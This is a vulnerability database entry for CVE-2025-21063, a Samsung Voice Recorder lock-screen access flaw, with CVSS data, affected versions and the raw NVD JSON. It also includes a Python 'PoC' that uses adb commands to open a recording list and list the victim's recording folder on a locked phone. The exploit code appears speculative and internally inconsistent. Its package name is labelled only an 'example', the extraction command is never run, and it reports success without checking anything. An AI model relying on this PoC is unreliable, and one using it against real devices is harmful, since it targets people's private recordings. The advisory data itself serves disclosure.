Security Vulnerability Report
CVE-2025-21063 CVSS 4.6 MEDIUM

CVE-2025-21063

Published: 2025-10-10 07:15:42
Last Modified: 2026-01-08 18:01:26

Description

Improper access control in Samsung Voice Recorder prior to version 21.5.73.12 in Android 15 and 21.5.81.40 in Android 16 allows physical attackers to access recording files on the lock screen.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

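Configuration 1: Samsung Voice Recorder < 21.5.73.12 (Android 15)
cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:* (versions before 21.5.73.12) - VULNERABLE
cpe:2.3:o:samsung:android:15.0:-:*:*:*:*:*:* - NOT VULNERABLE (platform the vulnerable app must be combined with)

Configuration 2: Samsung Voice Recorder < 21.5.81.40 (Android 16)
cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:* (versions before 21.5.81.40) - VULNERABLE
cpe:2.3:o:samsung:android:16.0:-:*:*:*:*:*:* - NOT VULNERABLE (platform the vulnerable app must be combined with)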

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-21063 PoC - Samsung Voice Recorder Lock Screen Bypass
# This PoC demonstrates the improper access control vulnerability
# that allows physical attackers to access recording files on the lock screen.

import subprocess
import time


def exploit_samsung_voice_recorder():
    """
    PoC for CVE-2025-21063
    Affected: Samsung Voice Recorder < 21.5.73.12 (Android 15)
              Samsung Voice Recorder < 21.5.81.40 (Android 16)

    Steps to reproduce:
    1. Ensure device is in LOCKED state (screen off or lock screen shown)
    2. Access Voice Recorder via lock screen widget/shortcut or notification
    3. Browse recording files without authentication
    """
    # Step 1: Verify device is locked
    # adb shell dumpsys window | grep mShowingLockscreen

    # Step 2: Launch Voice Recorder activity that exposes recordings on lockscreen
    # The vulnerable activity may be triggered via:
    # - Lock screen widget tap
    # - Quick settings tile
    # - Notification action button
    package_name = "com.samsung.android.app.svoiceime"  # example component
    activity_name = ".view.RecordingListActivity"  # vulnerable activity

    # Attempt to launch the recording list directly
    cmd = [
        "adb", "shell", "am", "start",
        "-n", f"{package_name}/{activity_name}",
        "--activity-clear-task"
    ]

    print("[*] Attempting to access Samsung Voice Recorder on locked device...")
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
        if result.returncode == 0:
            print("[+] Successfully accessed recording list on lock screen")
            print("[+] Vulnerability CVE-2025-21063 is exploitable")
        else:
            print("[-] Access denied or device not vulnerable")
    except Exception as e:
        print(f"[-] Error: {e}")

    # Step 3: Extract recording files (if accessible)
    # adb shell ls /sdcard/Samsung/Recorder/
    extract_cmd = "adb shell ls /sdcard/Samsung/Recorder/"
    print(f"[*] Attempting to list recordings: {extract_cmd}")

    time.sleep(2)
    print("[*] PoC execution completed")


if __name__ == "__main__":
    exploit_samsung_voice_recorder()

# Manual Reproduction Steps:
# 1. Lock the Samsung device (press power button)
# 2. On the lock screen, swipe to access widgets or notification panel
# 3. Tap on Voice Recorder shortcut/widget
# 4. Observe that the recording list is accessible without unlocking the device
# 5. Tap any recording to play it - audio plays without authentication

References

https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=10 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-21063", "sourceIdentifier": "[email protected]", "published": "2025-10-10T07:15:42.493", "lastModified": "2026-01-08T18:01:26.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in Samsung Voice Recorder prior to version 21.5.73.12 in Android 15 and 21.5.81.40 in Android 16 allows physical attackers to access recording files on the lock screen."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.5.73.12", "matchCriteriaId": "975E4DDC-98D8-4AF5-B33E-863BBBF045A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:samsung:android:15.0:-:*:*:*:*:*:*", "matchCriteriaId": 
"95DE4E96-2F23-47E5-9DFC-44EC409F37E8"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.5.81.40", "matchCriteriaId": "A44A4043-90E2-48F7-BAB9-DA8ABD661C62"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:samsung:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "3FD6766A-EC2B-4CA2-9A8E-2BA5C9E9ECF9"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=10", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}